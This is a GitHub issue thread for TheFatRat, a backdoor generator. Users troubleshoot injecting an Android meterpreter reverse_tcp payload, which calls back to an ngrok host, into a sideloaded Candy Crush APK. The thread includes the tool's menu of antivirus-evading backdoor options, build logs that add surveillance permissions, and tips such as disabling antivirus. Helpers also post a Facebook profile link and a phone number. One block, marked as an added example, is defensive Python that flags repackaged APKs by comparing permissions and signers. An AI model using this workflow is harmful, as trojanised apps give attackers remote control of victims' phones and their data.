screetsec / TheFatRat

TheFatRat, a massive exploiting tool: an easy tool to generate backdoors and an easy tool for post-exploitation attacks such as browser attacks. This tool compiles malware with popular payloads, and the compiled malware can then be executed on Windows, Android and Mac. The malware created with this tool also has the ability to bypass most AV software protection.
GNU General Public License v3.0

[x] There was an error in the creation of your RAT APK file #295

Closed a-zamani closed 5 years ago

a-zamani commented 6 years ago

Hi. My problem is in the last step of creating a "Backdoor" file. It worked well before!! Method 1 is not good because the file is not installed on the phone, but method number 5 is very good for the original file. I am at the last stage:

[+] Infected file /root/TheFatRat-master/temp/app_backdoored.apk ready.

\e[1;31m 
[x] There was an error in the creation of your RAT APK file , the possible reasons are :
- The architecture of the file is not for android
- The original APK is protected
- It was not possible to inject the payload in the hook you selected (in this case select a different hook point)
Check log file at : /root/TheFatRat-master/logs/apk-old.log

File : any original .apk, for example Flopy Bird_v3.apk

Dongle wifi :

Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

PID Name
509 NetworkManager
940 wpasupplicant
3294 dhclient
3528 dhclient

PHY Interface Driver Chipset
phy0 wlan0 rt2800usb D-Link System DWA-125 Wireless N 150 Adapter(rev.A2) [Ralink RT3070]
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)

I'm sorry for the beginner's question. Thanks.

doortack commented 6 years ago

I also had trouble the first time I tried to infect an APK file; it said the exact same thing it said to you. So what I did was re-download a very small game that was an APK and then just try it again using a different option. What are the options that you used, from the first option list all the way to the end? If you could tell me that, I might be able to help more.

a-zamani commented 6 years ago

I will proceed to the following steps to build the "backdoor" file.

  1. I completely shut down the Windows anti virus
  2. I connect the dongle
  3. At the root of the file, type ./fatrat
  4. Choose No. 5: [05] Backdooring Original apk [Instagram, Line,etc]
  5. I use the NGROK for lport and lhost
  6. [3] android / meterpreter / reverse_tcp
  7. [2] Use the old Fatrat method

And option 1, [01] Create Backdoor with msfvenom, gives an uninstallable file. It does not work.

Was my answer complete?

doortack commented 6 years ago

I would just try doing it with a different .APK file. I don't think it's because you're using NGROK, since your problem doesn't stem from connecting. Why do you put ./futt? I didn't have to do that. The last thing I could recommend is making sure everything you do is in root. That screwed me up the first time. Oh yes, and are all your dependencies installed?

a-zamani commented 6 years ago

Where do I download the apk file? What is your suggestion? Sorry, I was writing mistakes. I mean "./fatrat". Yes, all parts are installed correctly. The software does not provide any warning and everything is safe.

a-zamani commented 6 years ago

Would not my WiFi dongle be appropriate?

doortack commented 6 years ago

Give me one second and I will find where I downloaded my .APK file from. Mine was the Candy Crush game that I just sideloaded from the internet without using the Google Play Store. What is the .APK application that you're trying to infect? And where did you get it? I truly believe that's the problem. And no, I don't believe your adapter is an issue as long as you can get an IP address and you're online. The error you're getting is stemming from it not being able to completely write to the APK file.

doortack commented 6 years ago

https://www.androidapksfree.com/apk/candy-crush-saga-apk-latest-version-download/ Make sure you have the .APK in a folder with root before you try to inject to it.

a-zamani commented 6 years ago

thank you . I'm testing. Sure♥

doortack commented 6 years ago

No problem buddy I hope it works for you and if not let me know.

a-zamani commented 6 years ago

[01]  Create Backdoor with msfvenom
[02]  Create Fud 100% Backdoor with Fudwin 1.0
[03]  Create Fud Backdoor with Avoid v1.2  
[04]  Create Fud Backdoor with backdoor-factory [embed] 
[05]  Backdooring Original apk [Instagram, Line,etc] 
[06]  Create Fud Backdoor 1000% with PwnWinds [Excelent] 
[07]  Create Backdoor For Office with Microsploit 
[08]  Trojan Debian Package For Remote Acces [Trodebi] 
[09]  Load/Create auto listeners  
[10]  Jump to msfconsole  
[11]  Searchsploit  
[12]  File Pumper [Increase Your Files Size] 
[13]  Configure Default Lhost & Lport 
[14]  Cleanup  
[15]  Help  
[16]  Credits  
[17]  Exit  

┌─[TheFatRat]──[~]─[menu]:
└─────► 5

[ ] Embed a Metasploit Payload in an original .apk files [ ]
[ ] This script is POC for injecting metasploit payload arbitary apk backdoor [ ]
[ ]===========================================================================[ ]

Cleaning Temp files Done!

Your local IPV4 address is : 192.168.8.128
Your local IPV6 address is : fe80::2**c
Your public IP address is : 45.142
Your Hostname is : 3(NXDAIN

Set LHOST IP: 0.tcp.ngrok.io

Set LPORT: 15079

Enter the path to your android app/game .(ex: /root/downloads/myapp.apk)

Path : /root/Downloads/candycrushsaga.apk

+-------------------------------------------+
| [ 1 ] android/meterpreter/reverse_http    |
| [ 2 ] android/meterpreter/reverse_https   |
| [ 3 ] android/meterpreter/reverse_tcp     |
| [ 4 ] android/shell/reverse_http          |
| [ 5 ] android/shell/reverse_https         |
| [ 6 ] android/shell/reverse_tcp           |
+-------------------------------------------+

Choose Payload : 3
[ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]
+------------------------------+
| [ 1 ] Use Backdoor-apk 0.2.2 |
| [ 2 ] Use old Fatrat method  |
+------------------------------+

Select Tool to create apk : 2

[ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]$ Generate Backdoor
+------------++-------------------------++-----------------------+
| Name       || Descript                || Your Input
+------------++-------------------------++-----------------------+
| LHOST      || The Listen Addres       || 0.tcp.ngrok.io
| LPORT      || The Listen Ports        || 15079
| OUTPUTNAME || The Filename output     || app_backdoored.apk
| PAYLOAD    || Payload To Be Used      || android/meterpreter/reverse_tcp
+------------++-------------------------++-----------------------+

[] Creating RAT payload with msfvenom
[✔] Done!
[] Creating a Valid Certificate
[✔] Done!
[*] Starting the merging process of RAT with the APK you selected

ruby: warning: shebang line ending with \r may cause problems
[] Signing payload..
[] Decompiling original APK..
[] Decompiling payload APK..
[] Locating onCreate() hook..
[] Copying payload files..
[] Loading temp/original/smali/com/king/candycrushsaga/CandyCrushSagaActivity.smali and injecting payload..
[] Poisoning the manifest with meterpreter permissions..
[] Adding android.permission.CHANGE_WIFI_STATE
[] Adding android.permission.ACCESS_COARSE_LOCATION
. . .
[] Adding android.permission.WRITE_CALL_LOG
[*] Rebuilding /root/TheFatRat-master/temp/app.apk with meterpreter injection as /root/TheFatRat-master/temp/app_backdoored.apk..
W: ERROR: Unknown option '--forced-package-id'
W: Android Asset Packaging Tool
W:
W: Usage:
W:  aapt l[ist] [-v] [-a] file.{zip,jar,apk}
W:    List contents of Zip-compatible archive.
W:
W:  aapt d[ump] [--values] [--include-meta-data] WHAT file.{apk} [asset [asset ...]]
W:    strings          Print the contents of the resource table string pool in the APK.
W:    badging          Print the label and icon for the app declared in APK.
W:    permissions      Print the permissions from the APK.
W:    resources        Print the resource table from the APK.
W:    configurations   Print the configurations in the APK.
W:    xmltree          Print the compiled xmls in the given assets.
W:    xmlstrings       Print the strings of the given compiled xml assets.
W:
W:  aapt p[ackage] [-d][-f][-m][-u][-v][-x][-z][-M AndroidManifest.xml] \
W:         [-0 extension [-0 extension ...]] [-g tolerance] [-j jarfile] \
W:         [--debug-mode] [--min-sdk-version VAL] [--target-sdk-version VAL] \
W:         [--app-version VAL] [--app-version-name TEXT] [--custom-package VAL] \
W:         [--rename-manifest-package PACKAGE] \
W:         [--rename-instrumentation-target-package PACKAGE] \
W:         [--utf16] [--auto-add-overlay] \
W:         [--max-res-version VAL] \
W:         [-I base-package [-I base-package ...]] \
W:         [-A asset-source-dir] [-G class-list-file] [-P public-definitions-file] \
W:         [-D main-dex-class-list-file] \
W:         [-S resource-sources [-S resource-sources ...]] \
W:         [-F apk-file] [-J R-file-dir] \
W:         [--product product1,product2,...] \
W:         [-c CONFIGS] [--preferred-density DENSITY] \
W:         [--split CONFIGS [--split CONFIGS]] \
W:         [--feature-of package [--feature-after package]] \
W:         [raw-files-dir [raw-files-dir] ...] \
W:         [--output-text-symbols DIR]
W:
W:    Package the android resources. It will read assets and resources that are
W:    supplied with the -M -A -S or raw-files-dir arguments. The -J -P -F and -R
W:    options control which files are output.
W:
W:  aapt r[emove] [-v] file.{zip,jar,apk} file1 [file2 ...]
W:    Delete specified files from Zip-compatible archive.
W: Exception in thread "main"
W:  aapt a[dd] [-v] file.{zip,jar,apk} file1 [file2 ...]
W:    Add specified files to Zip-compatible archive.
W:
W:  aapt c[runch] [-v] -S resource-sources ... -C output-folder ...
W:    Do PNG preprocessing on one or several resource folders
W:    and store the results in the output folder.
W:
W:  aapt s[ingleCrunch] [-v] -i input-file -o outputfile
W:    Do PNG preprocessing on a single file.
W:
W:  aapt v[ersion]
W:    Print program version.
W:
. . . .
W:    changed to absolute names with the old package so that the code
W:    does not need to change.
W:  --rename-instrumentation-target-package
W:    Rewrite the manifest so that all of its instrumentation
W:    components target the given package. Useful when used in
W:    conjunction with --rename-manifest-package to fix tests against
brut.androlib.AndrolibException: brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 2): [aapt, p, --forced-package-id, 127, --min-sdk-version, 16, --target-sdk-version, 25, --version-code, 1129002, --version-name, 1.129.0.2, --no-version-vectors, -F, /tmp/APKTOOL3506179456145225376.tmp, -0, arsc, -0, META-INF/android.arch.lifecycle_runtime.version, -0, META-INF/com.android.support_support-compat.version, -0, META-INF/com.android.support_support-core-ui.version, -0, META-INF/com.android.support_support-core-utils.version, -0, META-INF/com.android.support_support-fragment.version, -0, META-INF/com.android.support_support-media-compat.version, -0, META-INF/com.android.support_support-v4.version, -0, assets/res_output/kingdom-views/content.meta.xml, -0, assets/res_output/levels/content.meta.xml, -0, assets/res_output/models/content.meta.xml, -0, assets/res_output/servicelayer-views/content.meta.xml, -0, woff2, -0, assets/res_output/tex/content.meta.xml, -0, assets/res_output/tex/menu/content.meta.xml, -0, vbl, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /root/TheFatRat-master/temp/original/res, -M, /root/TheFatRat-master/temp/original/AndroidManifest.xml]
    at brut.androlib.Androlib.buildResourcesFull(Androlib.java:477)
    at brut.androlib.Androlib.buildResources(Androlib.java:411)
    at brut.androlib.Androlib.build(Androlib.java:310)
    at brut.androlib.Androlib.build(Androlib.java:263)
    at brut.apktool.Main.cmdBuild(Main.java:227)
    at brut.apktool.Main.main(Main.java:84)
Caused by: brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 2): [aapt, p, --forced-package-id, 127, --min-sdk-version, 16, --target-sdk-version, 25, --version-code, 1129002, --version-name, 1.129.0.2, --no-version-vectors, -F, /tmp/APKTOOL3506179456145225376.tmp, -0, arsc, -0, META-INF/android.arch.lifecycle_runtime.version, -0, META-INF/com.android.support_support-compat.version, -0, META-INF/com.android.support_support-core-ui.version, -0, META-INF/com.android.support_support-core-utils.version, -0, META-INF/com.android.support_support-fragment.version, -0, META-INF/com.android.support_support-media-compat.version, -0, META-INF/com.android.support_support-v4.version, -0, assets/res_output/kingdom-views/content.meta.xml, -0, assets/res_output/levels/content.meta.xml, -0, assets/res_output/models/content.meta.xml, -0, assets/res_output/servicelayer-views/content.meta.xml, -0, woff2, -0, assets/res_output/tex/content.meta.xml, -0, assets/res_output/tex/menu/content.meta.xml, -0, vbl, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /root/TheFatRat-master/temp/original/res, -M, /root/TheFatRat-master/temp/original/AndroidManifest.xml]
    at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:440)
    at brut.androlib.Androlib.buildResourcesFull(Androlib.java:463)
    ... 5 more
Caused by: brut.common.BrutException: could not exec (exit code = 2): [aapt, p, --forced-package-id, 127, --min-sdk-version, 16, --target-sdk-version, 25, --version-code, 1129002, --version-name, 1.129.0.2, --no-version-vectors, -F, /tmp/APKTOOL3506179456145225376.tmp, -0, arsc, -0, META-INF/android.arch.lifecycle_runtime.version, -0, META-INF/com.android.support_support-compat.version, -0, META-INF/com.android.support_support-core-ui.version, -0, META-INF/com.android.support_support-core-utils.version, -0, META-INF/com.android.support_support-fragment.version, -0, META-INF/com.android.support_support-media-compat.version, -0, META-INF/com.android.support_support-v4.version, -0, assets/res_output/kingdom-views/content.meta.xml, -0, assets/res_output/levels/content.meta.xml, -0, assets/res_output/models/content.meta.xml, -0, assets/res_output/servicelayer-views/content.meta.xml, -0, woff2, -0, assets/res_output/tex/content.meta.xml, -0, assets/res_output/tex/menu/content.meta.xml, -0, vbl, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /root/TheFatRat-master/temp/original/res, -M, /root/TheFatRat-master/temp/original/AndroidManifest.xml]
    at brut.util.OS.exec(OS.java:95)
    at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:434)
    ... 6 more
W:    a package that has been renamed.
W:  --product
W:    Specifies which variant to choose for strings that have
W:    product variants
W:  --utf16
W:    changes default encoding for resources to UTF-16. Only useful when API
W:    level is set to 7 or higher where the default encoding is UTF-8.
W:  --non-constant-id
W:    Make the resources ID non constant. This is required to make an R java class
W:    that does not contain the final value but is used to make reusable compiled
W:    libraries that need to access resources.
W:  --shared-lib
W:    Make a shared library resource package that can be loaded by an application
W:    at runtime to access the libraries resources. Implies --non-constant-id.
W:  --app-as-shared-lib
W:    Make an app resource package that also can be loaded as shared library at runtime.
W:    Implies --non-constant-id.
W:  --error-on-failed-insert
W:    Forces aapt to return an error if it fails to insert values into the manifest
W:    with --debug-mode, --min-sdk-version, --target-sdk-version --version-code
W:    and --version-name.
W:    Insertion typically fails if the manifest already defines the attribute.
W:  --error-on-missing-config-entry
W:    Forces aapt to return an error if it fails to find an entry for a configuration.
W:  --output-text-symbols
W:    Generates a text file containing the resource symbols of the R class in the
W:    specified folder.
W:  --ignore-assets
W:    Assets to be ignored. Default pattern is:
W:    !.svn:!.git:!.dsstore:!.scc:.:
:!CVS:!thumbs.db:!picasa.ini:!~
W:  --skip-symbols-without-default-localization
W:    Prevents symbols from being generated for strings that do not have a default
W:    localization
W:  --no-version-vectors
W:    Do not automatically generate versioned copies of vector XML resources.
W:  --no-version-transitions
W:    Do not automatically generate versioned copies of transition XML resources.
W:  --private-symbols
W:    Java package name to use when generating R.java for private resources.
[+] Infected file /root/TheFatRat-master/temp/app_backdoored.apk ready.

\e[1;31m
[x] There was an error in the creation of your RAT APK file , the possible reasons are :
- The architecture of the file is not for android
- The original APK is protected
- It was not possible to inject the payload in the hook you selected (in this case select a different hook point)
Check log file at : /root/TheFatRat-master/logs/apk-old.log

Press [ENTER] key to return to fatrat menu
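
From the defender's side, the build log above shows two things that make a repackaged APK differ from the publisher's original: permissions added to the manifest and a freshly created signing certificate. The following is an added example, not part of this thread or of TheFatRat; it compares text of the kind printed by `aapt dump permissions` (listed in the usage output above) and `apksigner verify --print-certs` (an assumption, not mentioned on this page), and the package name, digests, sample outputs and the `SENSITIVE` list are constructed.

```python
"""Added example: compare a suspect APK with the publisher's original build."""
import re

# aapt prints either  uses-permission: android.permission.X
# or                  uses-permission: name='android.permission.X'
PERM_RE = re.compile(r"^uses-permission:\s*(?:name=')?([\w.]+)'?", re.M)
CERT_RE = re.compile(r"certificate SHA-256 digest:\s*([0-9a-fA-F]{64})")

# Reviewer's choice of permissions worth an immediate look (assumption).
SENSITIVE = {"android.permission." + p for p in (
    "ACCESS_COARSE_LOCATION", "ACCESS_FINE_LOCATION", "READ_CALL_LOG",
    "WRITE_CALL_LOG", "READ_SMS", "SEND_SMS", "RECORD_AUDIO", "CAMERA",
    "READ_CONTACTS")}


def parse_permissions(aapt_text):
    """Permission names from `aapt dump permissions` text."""
    return set(PERM_RE.findall(aapt_text))


def parse_cert_digests(apksigner_text):
    """Lower-cased signer digests from `apksigner verify --print-certs` text."""
    return {d.lower() for d in CERT_RE.findall(apksigner_text)}


def compare(orig_aapt, sus_aapt, orig_signer, sus_signer):
    """Diff permissions and signer digests of a suspect build against the original."""
    added = sorted(parse_permissions(sus_aapt) - parse_permissions(orig_aapt))
    trusted = parse_cert_digests(orig_signer)
    seen = parse_cert_digests(sus_signer)
    # Fail closed: no parsable signer, or no overlap with the trusted set.
    signer_changed = not seen or seen.isdisjoint(trusted)
    if signer_changed:
        verdict = "repackaged"   # same package name, different signing key
    elif added:
        verdict = "review"       # same signer, but the manifest grew
    else:
        verdict = "ok"
    return {"added": added,
            "sensitive_added": [p for p in added if p in SENSITIVE],
            "signer_changed": signer_changed,
            "verdict": verdict}


# --- constructed sample inputs (package name and digests are made up) ---
ORIGINAL_AAPT = """package: com.example.game
uses-permission: name='android.permission.INTERNET'
uses-permission: name='android.permission.ACCESS_NETWORK_STATE'
"""
# The three added permissions are the ones visible in the build log above.
SUSPECT_AAPT = """package: com.example.game
uses-permission: android.permission.INTERNET
uses-permission: android.permission.ACCESS_NETWORK_STATE
uses-permission: android.permission.CHANGE_WIFI_STATE
uses-permission: android.permission.ACCESS_COARSE_LOCATION
uses-permission: android.permission.WRITE_CALL_LOG
"""
ORIGINAL_SIGNER = ("Signer #1 certificate DN: CN=Example Publisher\n"
                   "Signer #1 certificate SHA-256 digest: " + "a1" * 32 + "\n")
SUSPECT_SIGNER = ("Signer #1 certificate DN: CN=Unknown\n"
                  "Signer #1 certificate SHA-256 digest: " + "B2" * 32 + "\n")

if __name__ == "__main__":
    for key, value in compare(ORIGINAL_AAPT, SUSPECT_AAPT,
                              ORIGINAL_SIGNER, SUSPECT_SIGNER).items():
        print(f"{key}: {value}")
```

A signer change can also come from a legitimate key rotation, so confirm the digest against the certificate the publisher actually ships before acting on the verdict.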

doortack commented 6 years ago

I almost have the answer it's pretty easy to explain but let me make sure I get it right. Give me about 5 minutes

a-zamani commented 6 years ago

OK : )

doortack commented 6 years ago

Hey brother do you have Facebook Messenger because I realize this is going to take a bit of explaining and I'd rather do it you know where I can copy and paste screenshots to you.

Me: Emmanuel Goldstein

https://m.facebook.com/profile.php?id=100008344723263

a-zamani commented 6 years ago

I'm sorry. I deleted my Facebook page after disclosing information by Facebook. Through another WhatsApp Email telegram

doortack commented 6 years ago

We can use WhatsApp if that's cool with you. Give me about 2 minutes to download it and send me your I guess screen name.

doortack commented 6 years ago

hey brother I was forced to get telegram instead because WhatsApp would not recognize my cell phone number. It's installed and ready to go now how do I contact you

a-zamani commented 6 years ago

OK Send a telegram now It is possible?

doortack commented 6 years ago

(281) 572-6297 Mike Jones

doortack commented 6 years ago

------- Your APK.log showing problems -------

[] Creating RAT payload with msfvenom
[✔] Done!
[] Creating a Valid Certificate
[✔] Done!
[*] Starting the merging process of RAT with the APK you selected

ruby: warning: shebang line ending with \r may cause problems
[] Signing payload..
[] Decompiling original APK..
[] Decompiling payload APK..
[] Locating onCreate() hook..
[] Copying payload files..
[] Loading temp/original/smali/com/king/candycrushsaga/CandyCrushSagaActivity.smali and injecting payload..
[] Poisoning the manifest with meterpreter permissions..
[] Adding android.permission.CHANGE_WIFI_STATE
[] Adding android.permission.ACCESS_COARSE_LOCATION

\e[1;31m
[x] There was an error in the creation of your RAT APK file , the possible reasons are :

The architecture of the file is not for android
The original APK is protected
It was not possible to inject the payload in the hook you selected (in this case select a different hook point)
Check log file at : /root/TheFatRat-master/logs/apk-old.log

doortack commented 6 years ago

| Tools paths configured in (setup.sh) for TheFatRat |

/usr/bin/xterm
/usr/bin/dig
/usr/bin/gcc
/usr/sbin/apache2
/usr/bin/gnome-terminal
/usr/bin/upx
/usr/bin/ruby
/usr/bin/openssl
/usr/bin/jarsigner
/usr/bin/unzip
/usr/bin/keytool
/root/TheFatRat/tools/android-sdk/zipalign
/root/TheFatRat/tools/proguard5.3.2/lib/proguard
/usr/bin/x86_64-w64-mingw32-gcc
/usr/bin/i686-w64-mingw32-gcc
/usr/local/sbin/dx
/usr/local/sbin/aapt
/usr/local/sbin/apktool
/usr/local/sbin/d2j-dex2jar
msfconsole
msfvenom
backdoor-factory
searchsploit
/usr/local/sbin/fatrat

###### My APK.log #######

136122818 9788 files
No encoder or badchars specified, outputting raw payload
Payload size: 10100 bytes
Saved as: /root/TheFatRat/temp/Rat.apk
I: Using Apktool 2.2.2 on Rat.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...

doortack commented 6 years ago

Install Instructions Quick Check

  1. Is at least Java 1.8 installed?
  2. Does executing java -version on command line / command prompt return 1.8 or greater?
  3. If not, please install Java 8+ and make it the default. (Java 7 will also work at this time)

Installation for Apktool

  1. Download Windows wrapper script (Right click, Save Link As apktool.bat)
  2. Download apktool-2 (find newest here)
  3. Rename downloaded jar to apktool.jar
  4. Move both files (apktool.jar & apktool.bat) to your Windows directory (Usually C://Windows)
  5. If you do not have access to C://Windows, you may place the two files anywhere then add that directory to your Environment Variables System PATH variable.
  6. Try running apktool via command prompt

Linux:

  1. Download Linux wrapper script (Right click, Save Link As apktool)
  2. Download apktool-2 (find newest here)
  3. Rename downloaded jar to apktool.jar
  4. Move both files (apktool.jar & apktool) to /usr/local/bin (root needed)
  5. Make sure both files are executable (chmod +x)
  6. Try running apktool via cli

a-zamani commented 6 years ago

I'm sorry to reply late. I do all the steps and let you know the result. ♥

a-zamani commented 6 years ago

root@zamani:~#  java -version
openjdk version "10.0.1" 2018-04-17
OpenJDK Runtime Environment (build 10.0.1+10-Debian-4)
OpenJDK 64-Bit Server VM (build 10.0.1+10-Debian-4, mixed mode)
==========================================
root@zamani:/usr/local/bin# chmod +x ./apktool.jar
root@zamani:/usr/local/bin# ./apktool.jar
Apktool v2.3.3 - a tool for reengineering Android apk files
with smali v2.2.2 and baksmali v2.2.2
Copyright 2014 Ryszard Wiśniewski <brut.alll@gmail.com>
Updated by Connor Tumbleson <connor.tumbleson@gmail.com>

usage: apktool
 -advance,--advanced   prints advance information.
 -version,--version    prints the version then exits
usage: apktool if|install-framework [options] <framework.apk>
 -p,--frame-path <dir>   Stores framework files into <dir>.
 -t,--tag <tag>          Tag frameworks using <tag>.
usage: apktool d[ecode] [options] <file_apk>
 -f,--force              Force delete destination directory.
 -o,--output <dir>       The name of folder that gets written. Default is apk.out
 -p,--frame-path <dir>   Uses framework files located in <dir>.
 -r,--no-res             Do not decode resources.
 -s,--no-src             Do not decode sources.
 -t,--frame-tag <tag>    Uses framework files tagged by <tag>.
usage: apktool b[uild] [options] <app_path>
 -f,--force-all          Skip changes detection and build all files.
 -o,--output <dir>       The name of apk that gets written. Default is dist/name.apk
 -p,--frame-path <dir>   Uses framework files located in <dir>.
For additional info, see: http://ibotpeaches.github.io/Apktool/ 
For smali/baksmali info, see: https://github.com/JesusFreke/smali
======================================
root@zamani:/usr/local/bin# chmod +x apktool.bat
root@zamani:/usr/local/bin# ./apktool.bat
no main manifest attribute, in /usr/local/bin/apktool.bat

a-zamani commented 6 years ago

I know that the code I installed is funny :D But I did not know how to do it

shashankgupta7 commented 6 years ago

Hello guys, I'm getting some error in fatrat, Someone please help me, I've tried everything but no luck, I'm using Fatrat on parrot os installed on Virtualbox and I'm using VPN service to port forward. Please help me.

[x] There was an error in the creation of your RAT APK file , the possible reasons are :

radiator303 commented 5 years ago

I think these few steps will help:

[https://github.com/Screetsec/TheFatRat/issues/340#issuecomment-507457574]

Oforimoses commented 4 years ago

Guys am getting this error any help

Enter the path to your android app/game .(ex: /root/downloads/myapp.apk)

Path : /root/Downloads/ofori.apk

File does not exist , make sure you write the right path of it .

brokeboy070 commented 2 years ago

Pls I have an issues installing up fatrat, it says I need to root my device before I can start it up😔. Pls I need help